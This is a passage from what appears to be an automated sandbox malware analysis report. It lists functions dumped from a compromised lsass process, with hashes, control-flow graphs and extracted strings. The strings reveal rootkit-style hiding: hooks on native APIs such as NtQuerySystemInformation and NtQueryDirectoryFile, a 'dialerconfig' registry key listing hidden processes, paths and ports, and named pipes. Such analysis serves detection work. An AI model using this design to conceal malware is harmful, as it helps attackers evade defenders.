                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81
                                                                          Function 00000140AE861628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781
                                                                          Function 00000140AE8612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791
                                                                          Function 00000140AE861D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2
                                                                          Function 00000140ADFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 326 140adfc6910-140adfc6916 327 140adfc6918-140adfc691b 326->327 328 140adfc6951-140adfc695b 326->328 329 140adfc691d-140adfc6920 327->329 330 140adfc6945-140adfc6984 call 140adfc6fc0 327->330 331 140adfc6a78-140adfc6a8d 328->331 332 140adfc6938 __scrt_dllmain_crt_thread_attach 329->332 333 140adfc6922-140adfc6925 329->333 349 140adfc698a-140adfc699f call 140adfc6e54 330->349 350 140adfc6a52 330->350 334 140adfc6a9c-140adfc6ab6 call 140adfc6e54 331->334 335 140adfc6a8f 331->335 341 140adfc693d-140adfc6944 332->341 337 140adfc6927-140adfc6930 333->337 338 140adfc6931-140adfc6936 call 140adfc6f04 333->338 347 140adfc6aef-140adfc6b20 call 140adfc7190 334->347 348 140adfc6ab8-140adfc6aed call 140adfc6f7c call 140adfc6e1c call 140adfc7318 call 140adfc7130 call 140adfc7154 call 140adfc6fac 334->348 339 140adfc6a91-140adfc6a9b 335->339 338->341 360 140adfc6b31-140adfc6b37 347->360 361 140adfc6b22-140adfc6b28 347->361 348->339 358 140adfc6a6a-140adfc6a77 call 140adfc7190 349->358 359 140adfc69a5-140adfc69b6 call 140adfc6ec4 349->359 354 140adfc6a54-140adfc6a69 350->354 358->331 376 140adfc69b8-140adfc69dc call 140adfc72dc call 140adfc6e0c call 140adfc6e38 call 140adfcac0c 359->376 377 140adfc6a07-140adfc6a11 call 140adfc7130 359->377 366 140adfc6b7e-140adfc6b94 call 140adfc268c 360->366 367 140adfc6b39-140adfc6b43 360->367 361->360 365 140adfc6b2a-140adfc6b2c 361->365 372 140adfc6c1f-140adfc6c2c 365->372 387 140adfc6bcc-140adfc6bce 366->387 388 140adfc6b96-140adfc6b98 366->388 373 140adfc6b4f-140adfc6b5d call 140adfd5780 367->373 374 140adfc6b45-140adfc6b4d 367->374 379 140adfc6b63-140adfc6b78 call 140adfc6910 373->379 391 140adfc6c15-140adfc6c1d 373->391 374->379 376->377 429 140adfc69de-140adfc69e5 __scrt_dllmain_after_initialize_c 376->429 377->350 399 140adfc6a13-140adfc6a1f call 140adfc7180 377->399 379->366 379->391 389 140adfc6bd5-140adfc6bea call 140adfc6910 387->389 390 140adfc6bd0-140adfc6bd3 387->390 388->387 396 140adfc6b9a-140adfc6bbc call 140adfc268c call 140adfc6a78 388->396 389->391 408 140adfc6bec-140adfc6bf6 389->408 390->389 390->391 391->372 396->387 423 140adfc6bbe-140adfc6bc6 call 140adfd5780 396->423 416 140adfc6a45-140adfc6a50 399->416 417 140adfc6a21-140adfc6a2b call 140adfc7098 399->417 413 140adfc6bf8-140adfc6bff 408->413 414 140adfc6c01-140adfc6c11 call 140adfd5780 408->414 413->391 414->391 416->354 417->416 428 140adfc6a2d-140adfc6a3b 417->428 423->387 428->416 429->377 430 140adfc69e7-140adfc6a04 call 140adfcabc8 429->430 430->377
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300
                                                                          Function 00000140AE86CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                          • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                            • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                            • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                            • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3
                                                                          Function 00000140AE862244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41
                                                                          Function 00000140ADFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 584 140adfc9944-140adfc99ac call 140adfca814 587 140adfc99b2-140adfc99b5 584->587 588 140adfc9e13-140adfc9e1b call 140adfcbb48 584->588 587->588 589 140adfc99bb-140adfc99c1 587->589 591 140adfc99c7-140adfc99cb 589->591 592 140adfc9a90-140adfc9aa2 589->592 591->592 596 140adfc99d1-140adfc99dc 591->596 594 140adfc9aa8-140adfc9aac 592->594 595 140adfc9d63-140adfc9d67 592->595 594->595 597 140adfc9ab2-140adfc9abd 594->597 599 140adfc9d69-140adfc9d70 595->599 600 140adfc9da0-140adfc9daa call 140adfc8a34 595->600 596->592 598 140adfc99e2-140adfc99e7 596->598 597->595 602 140adfc9ac3-140adfc9aca 597->602 598->592 603 140adfc99ed-140adfc99f7 call 140adfc8a34 598->603 599->588 604 140adfc9d76-140adfc9d9b call 140adfc9e1c 599->604 600->588 610 140adfc9dac-140adfc9dcb call 140adfc6d40 600->610 607 140adfc9c94-140adfc9ca0 602->607 608 140adfc9ad0-140adfc9b07 call 140adfc8e10 602->608 603->610 618 140adfc99fd-140adfc9a28 call 140adfc8a34 * 2 call 140adfc9124 603->618 604->600 607->600 611 140adfc9ca6-140adfc9caa 607->611 608->607 622 140adfc9b0d-140adfc9b15 608->622 615 140adfc9cac-140adfc9cb8 call 140adfc90e4 611->615 616 140adfc9cba-140adfc9cc2 611->616 615->616 629 140adfc9cdb-140adfc9ce3 615->629 616->600 621 140adfc9cc8-140adfc9cd5 call 140adfc8cb4 616->621 652 140adfc9a48-140adfc9a52 call 140adfc8a34 618->652 653 140adfc9a2a-140adfc9a2e 618->653 621->600 621->629 626 140adfc9b19-140adfc9b4b 622->626 631 140adfc9c87-140adfc9c8e 626->631 632 140adfc9b51-140adfc9b5c 626->632 633 140adfc9ce9-140adfc9ced 629->633 634 140adfc9df6-140adfc9e12 call 140adfc8a34 * 2 call 140adfcbaa8 629->634 631->607 631->626 632->631 635 140adfc9b62-140adfc9b7b 632->635 637 140adfc9cef-140adfc9cfe call 140adfc90e4 633->637 638 140adfc9d00 633->638 634->588 639 140adfc9c74-140adfc9c79 635->639 640 140adfc9b81-140adfc9bc6 call 140adfc90f8 * 2 635->640 648 140adfc9d03-140adfc9d0d call 140adfca8ac 637->648 638->648 644 140adfc9c84 639->644 665 140adfc9bc8-140adfc9bee call 140adfc90f8 call 140adfca038 640->665 666 140adfc9c04-140adfc9c0a 640->666 644->631 648->600 663 140adfc9d13-140adfc9d61 call 140adfc8d44 call 140adfc8f50 648->663 652->592 669 140adfc9a54-140adfc9a74 call 140adfc8a34 * 2 call 140adfca8ac 652->669 653->652 657 140adfc9a30-140adfc9a3b 653->657 657->652 662 140adfc9a3d-140adfc9a42 657->662 662->588 662->652 663->600 684 140adfc9c15-140adfc9c72 call 140adfc9870 665->684 685 140adfc9bf0-140adfc9c02 665->685 673 140adfc9c0c-140adfc9c10 666->673 674 140adfc9c7b 666->674 690 140adfc9a8b 669->690 691 140adfc9a76-140adfc9a80 call 140adfca99c 669->691 673->640 675 140adfc9c80 674->675 675->644 684->675 685->665 685->666 690->592 694 140adfc9a86-140adfc9def call 140adfc86ac call 140adfca3f4 call 140adfc88a0 691->694 695 140adfc9df0-140adfc9df5 call 140adfcbaa8 691->695 694->695 695->634
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                          Function 00000140AE86A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 705 140ae86a544-140ae86a5ac call 140ae86b414 708 140ae86a5b2-140ae86a5b5 705->708 709 140ae86aa13-140ae86aa1b call 140ae86c748 705->709 708->709 710 140ae86a5bb-140ae86a5c1 708->710 712 140ae86a5c7-140ae86a5cb 710->712 713 140ae86a690-140ae86a6a2 710->713 712->713 717 140ae86a5d1-140ae86a5dc 712->717 715 140ae86a963-140ae86a967 713->715 716 140ae86a6a8-140ae86a6ac 713->716 718 140ae86a9a0-140ae86a9aa call 140ae869634 715->718 719 140ae86a969-140ae86a970 715->719 716->715 720 140ae86a6b2-140ae86a6bd 716->720 717->713 721 140ae86a5e2-140ae86a5e7 717->721 718->709 731 140ae86a9ac-140ae86a9cb call 140ae867940 718->731 719->709 722 140ae86a976-140ae86a99b call 140ae86aa1c 719->722 720->715 724 140ae86a6c3-140ae86a6ca 720->724 721->713 725 140ae86a5ed-140ae86a5f7 call 140ae869634 721->725 722->718 728 140ae86a894-140ae86a8a0 724->728 729 140ae86a6d0-140ae86a707 call 140ae869a10 724->729 725->731 739 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 725->739 728->718 732 140ae86a8a6-140ae86a8aa 728->732 729->728 744 140ae86a70d-140ae86a715 729->744 736 140ae86a8ac-140ae86a8b8 call 140ae869ce4 732->736 737 140ae86a8ba-140ae86a8c2 732->737 736->737 753 140ae86a8db-140ae86a8e3 736->753 737->718 743 140ae86a8c8-140ae86a8d5 call 140ae8698b4 737->743 773 140ae86a62a-140ae86a62e 739->773 774 140ae86a648-140ae86a652 call 140ae869634 739->774 743->718 743->753 745 140ae86a719-140ae86a74b 744->745 750 140ae86a887-140ae86a88e 745->750 751 140ae86a751-140ae86a75c 745->751 750->728 750->745 751->750 754 140ae86a762-140ae86a77b 751->754 755 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 753->755 756 140ae86a8e9-140ae86a8ed 753->756 758 140ae86a874-140ae86a879 754->758 759 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 754->759 755->709 760 140ae86a900 756->760 761 140ae86a8ef-140ae86a8fe call 140ae869ce4 756->761 764 140ae86a884 758->764 786 140ae86a804-140ae86a80a 759->786 787 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 759->787 769 140ae86a903-140ae86a90d call 140ae86b4ac 760->769 761->769 764->750 769->718 784 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 769->784 773->774 778 140ae86a630-140ae86a63b 773->778 774->713 790 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 774->790 778->774 783 140ae86a63d-140ae86a642 778->783 783->709 783->774 784->718 794 140ae86a80c-140ae86a810 786->794 795 140ae86a87b 786->795 806 140ae86a815-140ae86a872 call 140ae86a470 787->806 807 140ae86a7f0-140ae86a802 787->807 811 140ae86a676-140ae86a680 call 140ae86b59c 790->811 812 140ae86a68b 790->812 794->759 796 140ae86a880 795->796 796->764 806->796 807->786 807->787 815 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 811->815 816 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 811->816 812->713 815->816 816->755
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                          Function 00000140AE86F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                          Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                          Function 00000140AE86D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                          Function 00000140AE867510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                          Function 00000140AE869DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                          Function 00000140AE873DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
